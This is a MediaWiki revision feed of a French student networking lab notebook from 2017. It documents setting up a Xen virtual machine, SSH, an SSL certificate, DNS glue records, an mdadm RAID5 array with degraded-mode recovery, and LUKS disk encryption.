 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46203</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46203"/>
				<updated>2017-11-13T10:46:05Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46202</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46202"/>
				<updated>2017-11-13T10:45:53Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
